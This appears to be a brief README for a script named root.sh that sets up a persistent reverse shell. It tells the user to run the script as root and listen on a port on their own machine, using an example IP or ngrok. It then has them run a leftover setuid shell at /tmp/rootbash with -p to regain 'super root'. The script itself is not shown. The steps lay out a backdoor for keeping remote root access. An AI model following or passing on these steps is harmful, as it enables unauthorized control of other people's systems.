HELLO EVERYONE, THIS SCRIPT WORK WITH A REVERSE SHELL PERSISTENT, HOW USE IT? SIMPLE, FIRST YOU NEED RUN WITH PERMISSION ROOT.

HERE ARE THE COMMANDS:
================|
chmod +x root.sh|
================|

step 2 | RUN SCRIPT

=========================|
./root.sh or bash root.sh|
=========================|

step 3 listen in your pc a port, example 1234, but you need change the ip, use your ip example: 192.168.15.71 or use the ngrok, much better!

after this, enter in diretory /tmp/ and you see a file called rootbash, run with : /tmp/rootbash -p, ready you have super root, good lucky with this!
